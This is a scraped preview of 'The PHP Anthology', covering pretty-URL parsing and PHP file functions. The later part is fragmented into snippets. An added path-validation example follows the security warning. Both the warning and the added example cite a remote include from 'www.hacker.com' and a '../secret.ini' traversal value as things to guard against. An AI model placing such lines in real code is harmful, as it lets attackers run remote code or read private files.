The PHP Anthology 2nd edition 2007 - part 4 ppt


Handling Pretty URLs

PHP makes the path information available in $_SERVER['PATH_INFO'] for the AcceptPathInfo or MultiViews solutions, and in $_SERVER['REQUEST_URI'] when using mod_rewrite. We can handle those paths using a simple PHP class that will extract the path information from the incoming request.

We’ll call the class RequestPath and give it a single private property, $parts, to hold all the parts of our request URLs:

RequestPath.class.php (excerpt)

    class RequestPath
    {
        private $parts = array();

The actual path parsing happens in the __construct method, which simply explodes the path on the forward slash (/) character and then proceeds to handle the first two path elements as special cases before dealing with the key-value pairs that follow them. The first thing we do is grab the path and trim the trailing / character if there is one:

RequestPath.class.php (excerpt)

        public function __construct()
        {
            if (isset($_SERVER['PATH_INFO'])) {
                $path = (substr($_SERVER['PATH_INFO'], -1) == "/")
                    ? substr($_SERVER['PATH_INFO'], 0, -1)
                    : $_SERVER['PATH_INFO'];
            } else {
                $path = (substr($_SERVER['REQUEST_URI'], -1) == "/")
                    ? substr($_SERVER['REQUEST_URI'], 0, -1)
                    : $_SERVER['REQUEST_URI'];
            }

Next, we split the path into an array on the / character. The first element we’ll consider to be the action, the second we’ll consider to be the type:

RequestPath.class.php (excerpt)

            $bits = explode("/", substr($path, 1));
            $parsed['action'] = array_shift($bits);
            $parsed[] = $parsed['action'];
            $parsed['type'] = array_shift($bits);
            $parsed[] = $parsed['type'];

The remaining elements we group into key-value pairs.
If an odd number of elements remains, we simply place the last element on the end of our key-value array:

RequestPath.class.php (excerpt)

            $parts_size = sizeof($bits);
            if ($parts_size % 2 != 0) {
                $parts_size -= 1;
            }
            for ($i = 0; $i < $parts_size; $i += 2) {
                $parsed[$bits[$i]] = $bits[$i+1];
                $parsed[] = $bits[$i+1];
            }
            if (sizeof($bits) % 2 != 0) {
                $parsed[] = array_pop($bits);
            }

Finally, as the last step of our constructor method, we assign our assembled array of path elements to our class’s private $parts array:

RequestPath.class.php (excerpt)

            $this->parts = $parsed;
        }

We can make use of the __get, __set, and __isset magic methods in our RequestPath class, enabling users of the class to get, set, and test the path element values by using the key as if it were a class property, and keeping our class nice and simple:

RequestPath.class.php (excerpt)

        public function __get($key)
        {
            return $this->parts[$key];
        }
        public function __set($key, $value)
        {
            // Write to the declared private $parts property
            $this->parts[$key] = $value;
        }
        public function __isset($key)
        {
            return isset($this->parts[$key]);
        }
    }
    ?>

Using the code is even simpler. Imagine that the incoming request is:

    http://yourhostname/edit/trackbacks/for/163-My-Example-Page

We can access the path information by creating a new RequestPath object:

    <?php
    require_once 'RequestPath.class.php';
    $request = new RequestPath();
    echo "Request action: {$request->action}<br />";
    echo "Request type: {$request->type}<br />";
    echo "Request for: {$request->for}<br />";
    ?>

That code should output the following:

    Request action: edit<br />
    Request type: trackbacks<br />
    Request for: 163-My-Example-Page<br />

Discussion

Once we have pretty URLs set up and functioning, we can start to implement professional solution architectures such as the Model-View-Controller architecture, or MVC.[16] Pretty URLs are fast becoming an essential requirement for popular sites and it’s important to think about your URLs carefully, and make them as memorable—or as “guessable”—as possible.

Summary

In this chapter, we’ve explored a number of ways to make building web forms and tables a whole lot easier, in order to free up our time to focus on the aspects of web development that matter. There’s some degree of commonality between every table and every form, yet our roles as developers involve handling the differences—we can automate the common ground, but we need to learn to handle the aspects that make each case unique. This chapter also gave us a chance to experiment with using the Apache web server and some simple PHP to apply pretty URLs in our web applications.

Together, tables, forms, and pretty URLs are common tasks in the working experience of any web developer. The goal of this chapter has been to highlight the aspects of development that we can automate, and to make it easier to handle the parts we can’t. Unfortunately, nothing but experience can make the job easy all the time!

[16] http://en.wikipedia.org/wiki/Model-view-controller

Chapter 6
Working with Files

Databases make great tools for storing information because they’re fast and, with the help of SQL, easy to navigate. Sometimes, though, you need to be able to access the data stored in a file—be it an image, configuration information, or even a web page on a remote server. PHP makes such work easy with its powerful collection of file functions. The only hard part is choosing the right tool for the job!

For the sake of demonstration, I’ve saved a copy of the printable version of Pax Dickinson’s article “Top 7 PHP Security Blunders!,”[1] which we’ll manipulate with PHP’s file functions.
The file is saved as writeSecureScripts.html in this book’s code archive.

[1] http://www.sitepoint.com/article/php-security-blunders

A Word on Security

Before you run riot with PHP’s file functions, think carefully about what you’re doing: you will be making files from your operating system available on a web page that will be exposed to the Internet. Check and double-check the code that accesses files—look for holes in your logic that might allow unwanted access to those files.

Be particularly careful when allowing files and directories to be identified via URLs, or to be uploaded or downloaded from your site. This warning also extends to PHP’s include commands, which can be used to execute scripts included from a remote web server, for example: include 'http://www.hacker.com/bad_script.txt';.

Because of the potential for danger, php.ini settings are available to turn off this functionality. Setting allow_url_fopen = Off disables the opening of remote files through the URL-aware fopen wrappers. As of version 5.2, there’s also the allow_url_include setting, which does the same thing for the include, include_once, require, and require_once functions. If allow_url_fopen is turned off, allow_url_include is automatically turned off as well.

I’ll be highlighting the potential dangers with each solution so that, with care, you can learn to write secure code.

How do I read a local file?

There are as many ways to read a local file as you can think of. In this solution, we’ll discuss a couple of the most popular approaches, but if you wish to continue investigating, check out the relevant manual page.[2]

Solutions

This section covers three options: reading a file as an array, reading a file as a string, and reading a file directly to the screen.
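The warning in “A Word on Security” about files identified via URLs can be enforced in code. The following is an added example, not from the book: resolveInBase() and the temporary directory layout are hypothetical names, the request values are constructed, and the type declarations assume PHP 7.1 or later.

```php
<?php
// Added example, not from the book: confine a URL-supplied file name to one
// directory. resolveInBase() and the temp layout are hypothetical names.
function resolveInBase(string $baseDir, string $requested): ?string
{
    // Refuse stream wrappers (http://, php://, ...) and NUL bytes outright.
    if (strpos($requested, '://') !== false || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks, and returns false when the
    // target does not exist, so only existing paths reach the prefix check.
    $base = realpath($baseDir);
    $full = $base === false ? false : realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // The trailing separator stops ".../docs-private" from matching ".../docs".
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// Constructed sample layout in the system temp directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'anthology_demo_' . getmypid();
mkdir($root . '/docs', 0700, true);
file_put_contents($root . '/docs/writeSecureScripts.html', '<p>sample</p>');
file_put_contents($root . '/secret.ini', 'password=constructed');

// Constructed request values, as they might arrive in $_GET['file'].
$requests = [
    'writeSecureScripts.html',               // the intended file
    '../secret.ini',                         // climbs out of docs/
    'http://www.hacker.com/bad_script.txt',  // remote URL from the text above
    'missing.html',                          // no such file
];
foreach ($requests as $name) {
    $path = resolveInBase($root . '/docs', $name);
    printf("%-38s %s\n", $name, $path === null ? 'rejected' : 'allowed: ' . $path);
}

// Report the two php.ini switches discussed above.
foreach (['allow_url_fopen', 'allow_url_include'] as $setting) {
    $on = filter_var(ini_get($setting), FILTER_VALIDATE_BOOLEAN);
    printf("%s = %s\n", $setting, $on ? 'On' : 'Off');
}

// Remove the constructed files.
array_map('unlink', [$root . '/docs/writeSecureScripts.html', $root . '/secret.ini']);
rmdir($root . '/docs');
rmdir($root);
```

Only a path returned by resolveInBase() should be handed to file, file_get_contents, or readfile; a null result means the request is refused.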
Reading a File as an Array

First up is PHP’s file function, which reads a file into an array, using the new line character to indicate where a new array element should begin:

fileFunc.php (excerpt)

    <?php
    $file = file('writeSecureScripts.html');
    $lines = count($file);
    $alt = '';
    for ($i=0; $i<$lines; $i++) {
        $alt = ($alt == 'even') ? 'odd' : 'even';
        echo '<div class="' . $alt . '">';
        echo $i . ': ' . htmlspecialchars($file[$i]);
        echo "</div>\n";
    }
    ?>

Hey, presto! Up pops the file in a nicely formatted page so you can examine it line by line. We simply loop over the $file variable—an array—with our for loop, and display it as we wish.

One thing you may have noticed in the above code is that we used a ternary operator for the alternate row colors in the line after the for loop. A ternary operator takes three arguments and is a shortcut approach to writing a simple if statement. The basic syntax is as follows:

    (condition) ? true : false

The output of our work can be seen in Figure 6.1.

Figure 6.1. Reading a local file as an array

Reading a File as a String

As of PHP 4.3, the function called file_get_contents reads a file straight into a string without breaking it up:

fileGetFunc.php (excerpt)

    <?php
    $file = file_get_contents('writeSecureScripts.html');
    $file = strip_tags($file);
    ?>
    <form>
    <textarea>
    <?php
    echo htmlspecialchars($file);
    ?>
    </textarea>
    </form>

The content of the file is now displayed in an HTML textarea stripped of all its HTML tags. The output is depicted in Figure 6.2.

Figure 6.2. Reading a local file as a string

Reading a File Directly to the Screen

Another way to read a local file is to use the readfile function, which fetches the content of the file and displays it directly on the screen:

readFileFunc.php (excerpt)

    <?php
    readfile('writeSecureScripts.html');
    ?>

[2] http://www.php.net/filesystem/

[...]

... used the addString method to add to the archive as files some of the data we fetched. The first argument represents the path and filename under which the string should be stored; the second is the string itself. That should give you a general idea of when Archive_Tar can be useful to you.

How do I work with files using the Standard PHP Library in PHP 5?

With the release of PHP 5, we were given access to the ...

... is_readable, to check whether the file can be read
■ is_writable, to check whether the file can be written to
■ filemtime, to check the date and time at which the file was last modified
■ fileatime, to find the date and time at which the file was last accessed
■ filesize, to check the file’s size

We also wrap the result in some custom code to make it more readable:

fileInfo.php (excerpt)

    <?php
    // Function ...

... all

Solution

PHP provides a very handy function for displaying code: highlight_string, which displays PHP code in a presentable manner using the formatting defined in php.ini.

[8] dir defines the Directory class—one of the predefined classes that are built into PHP. You can read more about predefined classes on the manual page at http://www.php.net/manual/en/reserved.classes.php
...

    header('Content-Length: ' . filesize($fileName));
    readfile($fileName);
    ?>

The Content-Disposition header tells the browser to treat the file as a download (that is, not to display it in the browser window), and gives it the name of the file. The Content-Type header also tells the browser what type of file we’re sending it. In most cases, the Content-Type should match the type of file you’re sending; however, Internet Explorer ... habit of displaying files of recognized types in the browser regardless of the content-disposition header, so we set the MIME type to the made-up value application/x-download for those browsers.

Finally, the content-length header tells the browser the size of the file, so that it’s able to display a download ...

... the manual page for fopen,[4] binary mode should always be specified to ensure the portability of your code between operating systems. For more information on the various modes that are available, read the manual page.

Handling Small Files

Now that we have a file handle, let’s use it to read the file:

fileHandle.php (excerpt)

    <?php
    $location ...

[4] http://www.php.net/fopen/

... do I work with files using the Standard PHP Library in PHP 5?”

Using the dir Pseudo-Class

The alternative approach is to use the dir pseudo-class.[8] dir is used in a very similar way to readdir:

readdir2.php (excerpt)

    <?php
    $location = './';
    $dir = dir($location);
    while ($entry = $dir->read()) {
        if (is_dir($location ...

... http://www.php.net/manual/en/ref.filesystem.php

    echo file_get_contents('writeSecureScripts.txt');
    echo '';
    ?>

We use the fwrite function to write a string to a file. Take note of the mode we used when we opened the new file with fopen. The mode w will open the file for writing, beginning at the very start of the file and overwriting ...

... need to move your code to another site, you’ll be able to modify the settings once, rather than hundreds of times throughout your code.

Solution

The easiest way to store configuration information is to create the variables in an ini file, then include this file in your code using the parse_ini_file function, ...

... I manage file downloads with PHP?”

How do I use file handles?

To use the file functions we saw in the previous solution, you simply need to point them at the file they have to read, using a path that’s relative to the PHP script that executes the function. However, the majority of PHP’s file functions use a slightly ...

Date posted: 13/08/2014, 09:20
